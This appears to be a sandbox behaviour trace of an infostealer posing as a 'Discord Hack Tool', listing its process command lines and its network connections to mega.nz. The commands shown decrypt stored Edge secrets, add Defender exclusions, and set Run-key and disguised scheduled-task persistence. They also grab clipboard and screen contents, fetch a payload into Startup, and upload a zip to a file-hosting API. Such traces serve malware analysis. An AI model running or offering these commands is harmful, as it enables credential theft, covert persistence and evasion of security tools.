C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,113,154,240,142,21,157,156,78,160,101,81,241,32,249,16,209,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,31,48,144,108,207,129,155,216,190,151,157,5,189,241,192,119,137,99,209,251,98,98,91,220,150,5,90,153,197,206,48,164,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,13,137,9,5,230,251,57,83,172,255,40,11,186,253,131,189,197,13,86,207,38,80,198,155,11,79,187,135,218,23,125,55,48,0,0,0,113,8,144,157,12,116,63,185,105,105,23,186,43,229,43,106,179,77,150,110,109,71,254,235,182,187,4,154,144,64,102,67,123,244,131,194,46,176,17,65,169,35,210,81,155,166,172,206,64,0,0,0,116,145,179,250,150,114,228,181,200,106,171,97,108,118,55,142,78,175,172,137,114,215,45,79,209,59,230,217,8,171,32,40,184,211,189,34,198,199,25,17,191,228,191,12,253,74,212,79,132,18,215,250,7,249,108,169,123,58,128,185,63,77,159,138), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp" "c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\getmac.exe
getmac /NH
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\Downloads\Discord Hack Tool.exe" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Aoyvszio.zip";
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.15:443 | g.api.mega.co.nz | tcp |
| NL | 66.203.127.11:443 | eu.static.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | gfs214n108.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs204n118.userstorage.mega.co.nz | udp |
| CA | 162.208.16.18:443 | gfs302n108.userstorage.mega.co.nz | tcp |
| CA | 162.208.16.18:443 | gfs302n108.userstorage.mega.co.nz | tcp |
